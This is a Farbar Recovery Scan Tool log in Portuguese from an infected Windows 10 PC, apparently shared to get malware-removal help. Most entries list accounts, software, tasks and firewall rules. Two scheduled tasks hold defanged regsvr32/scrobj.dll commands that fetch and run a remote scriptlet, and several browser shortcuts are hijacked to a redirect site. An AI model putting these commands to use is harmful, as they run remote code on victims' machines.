Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:27-01-2016
Executado por Hakaz7 (2017-04-21 14:23:48)
Executando a partir de C:\Users\Hakaz7\Desktop
Windows 10 Pro (X64) (2016-09-15 15:44:03)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-1487806579-2887001220-3690848270-500 - Administrator - Disabled)
aldem (S-1-5-21-1487806579-2887001220-3690848270-1003 - Limited - Enabled) => C:\Users\aldem
Convidado (S-1-5-21-1487806579-2887001220-3690848270-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1487806579-2887001220-3690848270-503 - Limited - Disabled)
Hakaz7 (S-1-5-21-1487806579-2887001220-3690848270-1000 - Administrator - Enabled) => C:\Users\Hakaz7
HomeGroupUser$ (S-1-5-21-1487806579-2887001220-3690848270-1002 - Limited - Enabled)
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
AIMP Classic (HKLM-x32\...\AIMPClassic) (Version: - )
ComicRack v0.9.176 (HKLM\...\ComicRack) (Version: v0.9.176 - cYo Soft)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DriversCloud.com (64 bits) (HKLM\...\{A156B6AA-A988-4BE4-8377-FE0D310FB49F}) (Version: 10.0.1.0 - Cybelsoft)
EagleGet version 2.0.4.19 (HKLM-x32\...\{F6D8142A-B30B-454B-9EE0-08A7B997DFE4}_is1) (Version: 2.0.4.19 - EagleGet)
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
Intel(R) Network Connections 15.2.89.2 (HKLM\...\PROSetDX) (Version: 15.2.89.2 - Intel)
K-Lite Mega Codec Pack 11.3.6 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.3.6 - )
Malwarebytes Anti-Malware versão 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 41.0.2 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 pt-BR)) (Version: 41.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0a1 - Mozilla)
MPC-HC 1.7.8 (HKLM-x32\...\{2624B969-7135-4EB1-B0F6-2D8C397B45F7}_is1) (Version: 1.7.8 - MPC-HC Team)
Nightly 43.0a1 (x64 en-US) (HKLM\...\Nightly 43.0a1 (x64 en-US)) (Version: 43.0a1 - Mozilla)
Opera Stable 44.0.2510.857 (HKLM-x32\...\Opera 44.0.2510.857) (Version: 44.0.2510.857 - Opera Software)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Private Internet Access Support Files (HKLM-x32\...\{7D72DAFF-DCB2-437B-BC22-4B2ABF21462B}) (Version: 1.0.0.0 - Private Internet Access)
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 2.45.0.0 - Goversoft LLC)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Spotify (HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
VDownloader Plus 4.2.1820 (HKLM\...\VDownloader Plus_is1) (Version: 4.2.1820 - )
Watchtower Library 2015 - Português (HKLM-x32\...\{C0581871-09A0-4AE4-B4C2-188E2A8AD5FA}) (Version: 17.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-1487806579-2887001220-3690848270-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\FileCoAuth.exe (Microsoft Corporation)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {026A821F-8398-4C7A-9415-F1690D2011A1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03AC74DB-BBD3-4F7F-B391-CEEBA99F502B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {097B0595-F663-42BB-AABC-CAFCFD985BCD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-27] (Google Inc.)
Task: {12B98FC6-062C-44B6-8433-7E5116B5BD8B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {1338BBB9-402D-41A9-9C9A-AB16163A54A5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {16A03400-EF94-475D-B197-C3A2E5701AED} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {306E14B8-D507-4D63-8B23-196C023D30D9} - System32\Tasks\Private Internet Access Startup => C:\Program Files\pia_manager\pia_manager.exe [2016-03-23] ()
Task: {308FDFF4-A13B-40ED-A83A-85CBEB81D670} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-27] (Google Inc.)
Task: {31F918BF-866D-4E0F-9CBF-2F387EB41B76} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {3230F5D5-3995-495C-82DC-802F3F297A64} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {378DEEE5-F320-41D1-927B-6F59CF5AE046} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {465E36D4-665C-4FBE-95FA-10E1A9683415} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2017-03-04] (Microsoft Corporation)
Task: {4AAAC00F-A704-48E4-83D4-10ECBAF2D2B1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {5C1E0603-BE9E-4BB8-9E17-2954C62AAA1E} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {67F0F594-BEDE-4499-AC0E-50C915D3E177} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6AD72B4B-85F1-4373-AC2D-654F1819B128} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6E9ADB02-B6DD-447E-B236-03F568A16191} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {6EBF8F81-1309-42DB-93AE-4A50DDD3C93C} - System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition => C:\Windows\system32\UpgradeSubscription.exe [2016-07-16] (Microsoft Corporation)
Task: {71ABB2F6-A74E-4CFB-BABB-D4670F8502F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {741881B2-CD8A-4512-8FAF-AC79A3CBD08E} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {79AF35CC-C4E4-405A-A612-9186E80E1C2C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {7A55049D-73DA-49EB-9656-4164E4B22FF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {84664C42-883A-4732-B22C-4A4EF94A0B2E} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {87876F0F-1362-41DF-A592-B647859387D6} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {89598D0D-BB1A-4B6E-BA0B-7F3ECC62C907} - System32\Tasks\Opera scheduled Autoupdate 1442452640 => C:\Program Files (x86)\Opera\launcher.exe [2017-03-21] (Opera Software)
Task: {8E567375-3AE8-42FF-ADAA-221461010F91} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {97428D03-ED99-4498-8F49-B1F92A687F20} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {A50FD54C-E34C-4E67-8401-334865E44CD3} - System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition => C:\Windows\system32\UpgradeSubscription.exe [2016-07-16] (Microsoft Corporation)
Task: {A9477F8C-3789-465D-9B1A-4B47F22D2876} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {ACEF1173-7D8B-4AB2-BB19-92543F6550B9} - System32\Tasks\Windows-WoShiBeiYongDe => /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81FTU3N8M5F8U5RkZYNjwxOUNQN8QQNjM8RjZQF8ZSNc== scrobj.dll
Task: {AE33619B-9CDE-4B51-8BE2-3EA49B792A25} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-08-05] (Microsoft Corporation)
Task: {BDA5345D-59D9-426F-A204-CDD8C51D0D00} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {C55F630C-52AF-4D43-9B56-E4286F8FAB2B} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {C584DED3-BD55-415E-B98E-7948FD354614} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {CE3156B4-617E-4A69-A706-4CFEE6C18A9A} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [2016-01-31] (Goversoft LLC)
Task: {CEDEA982-B649-44DA-AB68-EFEF9A463CAF} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D7363947-96AE-4959-8D5B-F7DB49B01864} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {E74ADD65-BA9B-49CD-95FC-2AC7D03291C4} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECD7BE54-F1F9-4EF8-8628-6DA7A95F4787} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {EDCD98EF-3CE4-4259-8BF3-D5F8350ED7C7} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-04-12] (Microsoft Corporation)
Task: {F17E6DC9-7789-4F4D-87BA-44E3B145FF27} - System32\Tasks\PowerWord-SCT-JT => /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81FTU3N8M5F8U5RkZYNjwxOUNQN8QQNjM8RjZQF8ZSNc== scrobj.dll
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
Shortcut: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Hakaz7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492614365&z=823f5a8f46c5a000f4208d1g4z8t4o6q1gdz8caqdw&from=che0812&uid=SAMSUNGXHD502HJ_S2BVJ56B617167
==================== Módulos Carregados (Whitelisted) ==============
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 14:17 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2011-06-15 04:57 - 2011-06-15 04:57 - 00034304 _____ () C:\WINDOWS\System32\ssb6mlm.dll
2017-04-12 14:17 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-15 12:51 - 2016-09-15 12:51 - 00959168 _____ () C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\amd64\ClientTelemetry.dll
2016-01-31 13:17 - 2016-01-31 13:17 - 03525431 _____ () C:\Program Files (x86)\PrivaZer\PrivaMenu5.dll
2016-09-15 22:48 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-15 04:58 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-15 04:58 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-15 04:58 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-15 04:58 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 14:17 - 2017-03-28 02:07 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-04-12 14:17 - 2017-03-28 02:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 14:17 - 2017-03-28 02:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-11 02:56 - 2017-04-11 02:57 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2017-04-17 20:49 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2016-09-15 12:51 - 2016-09-15 12:51 - 00679624 _____ () C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\ClientTelemetry.dll
2017-03-24 10:48 - 2017-03-24 10:48 - 63944280 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\opera_browser.dll
2017-03-24 10:48 - 2017-03-24 10:47 - 02101336 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\libglesv2.dll
2017-03-24 10:48 - 2017-03-24 10:47 - 00087128 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\libegl.dll
2017-04-17 20:49 - 2017-04-17 00:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2017-04-17 20:49 - 2017-04-17 00:03 - 00106496 _____ () C:\ProgramData\Software\Apple\Apps\Notification.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\samsungsetup.com -> hxxp://www.samsungsetup.com
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-13 23:34 - 2016-01-29 19:12 - 00000027 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Hakaz7\Documents\EGDownloads\visão.jpg
DNS Servers: 200.189.80.124 - 200.189.80.110
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{727280AB-00B9-43CD-86B0-B628ECAA2748}C:\program files\comicrack\comicrack.exe] => (Block) C:\program files\comicrack\comicrack.exe
FirewallRules: [TCP Query User{B5578DD4-5AD8-4C9E-8859-67531B323C37}C:\program files\comicrack\comicrack.exe] => (Block) C:\program files\comicrack\comicrack.exe
FirewallRules: [UDP Query User{2173846D-BE62-4434-BAC0-2B5C666DBB60}C:\users\hakaz7\desktop\u1504.exe] => (Allow) C:\users\hakaz7\desktop\u1504.exe
FirewallRules: [TCP Query User{6C901EC6-9AC6-4C79-AE1F-E7A0BB4FC635}C:\users\hakaz7\desktop\u1504.exe] => (Allow) C:\users\hakaz7\desktop\u1504.exe
FirewallRules: [UDP Query User{425650B8-A73E-4262-9915-00BB1328DE1A}C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe] => (Block) C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe
FirewallRules: [TCP Query User{71FEE34B-14AC-4448-8990-D3037358E40B}C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe] => (Block) C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe
FirewallRules: [UDP Query User{FE981564-E1DA-40A4-BE8A-20DAF1DB712E}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{973A1226-CB31-44FB-A343-2C2C3B942D59}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{2F948DFB-9F89-4F7C-B57A-CCE70298D179}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{F70EB1CB-4C4C-4B7B-85C0-02BFF8301C6E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AE6F9839-9CC3-4226-AF12-E1B67F2C41C9}] => (Allow) C:\Program Files\Nightly\firefox.exe
FirewallRules: [{500A9256-49D3-4BAC-AEB9-4B1EE56300F8}] => (Allow) C:\Program Files\Nightly\firefox.exe
FirewallRules: [TCP Query User{BA9669A7-D367-4E07-86A1-3DC29A57C5B7}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{7A97CE21-0EA4-417D-B648-9B2524714F93}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{6B1A2B88-5170-41C3-A53B-051873648F21}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{035ED720-88D5-4ADA-8677-5A8092FBAAF1}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{23A6B6C3-D122-415E-96E5-A6381D1B932F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D4FD9A26-9070-44B9-A8DA-8B9CABDE0D1A}] => (Allow) LPort=2869
FirewallRules: [{FA56EC70-193E-4206-B035-DAB3DF538830}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{4F74E4AC-1C7F-4E39-AEB8-23A3918E9BFC}C:\users\hakaz7\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hakaz7\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{A2412B98-FC4F-4E58-BD46-719D5E12A58D}C:\users\hakaz7\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hakaz7\appdata\roaming\spotify\spotify.exe
FirewallRules: [{06D1A383-5285-4FB0-B75C-A4B1D8F83485}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe
FirewallRules: [{8EC69FF0-F5A9-4DFC-8331-63B9BB9E5781}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe
FirewallRules: [TCP Query User{F11581BB-7FF9-4C09-97AB-31C22FEAB8D6}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
